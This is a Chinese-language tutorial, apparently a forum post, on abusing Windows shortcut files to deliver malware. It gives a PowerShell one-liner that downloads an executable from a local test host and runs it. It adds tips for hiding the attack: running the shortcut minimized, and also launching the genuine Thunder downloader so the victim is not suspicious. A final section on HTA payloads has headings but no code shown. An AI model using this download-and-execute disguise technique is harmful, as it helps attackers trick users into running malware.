前言
快捷方式是大家计算机最普遍存在的文件,大家应该都不会认为它能有什么危险的,所以往往很容易忽略它。本文就来探讨一下快捷方式的恶意利用技巧。
恶意利用powershell下载木马并执行
如何利用powershell下载木马并执行呢?cmd中我们可以使用&&来进行多命令执行,powershell也是用;来执行多命令的。
基本思路
1、快捷方式调用powershell中Invoke-WebRequest下载文件
2、语句使用;连接,语句被执行才会继续下一步操作
3、执行恶意文件
实验验证
[AppleScript] 纯文本查看 复制代码
|
1
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Invoke-WebRequest -uri [url]http://127.0.0.1/calc.exe[/url] -outfile D:\test\calc.exe;powershell.exe D:\test\calc.exe |
运行正常,可以发现成功下载了我们的验证程序并执行了。
奇技淫巧
1、将快捷方式的运行方式设置为最小化,防止一闪而过得黑框。
2、真实程序,隐藏自身
我们在后面加上
[AppleScript] 纯文本查看 复制代码
|
1
|
powershell.exe D:\xunlei\Program\Thunder.exe |
打开一个正常的迅雷程序,这样就不起疑心了。表面上看来完全是一个正常的快捷方式。
恶作剧
1、什么是HTA?
HTA是HTML Application的缩写(HTML应用程序),是软件开发的新概念,直接将HTML保存成HTA的格式,就是一个独立的应用软件。
2、利用快捷方式执行我们的HTA恶意程序
恶意代码:
运行结果:
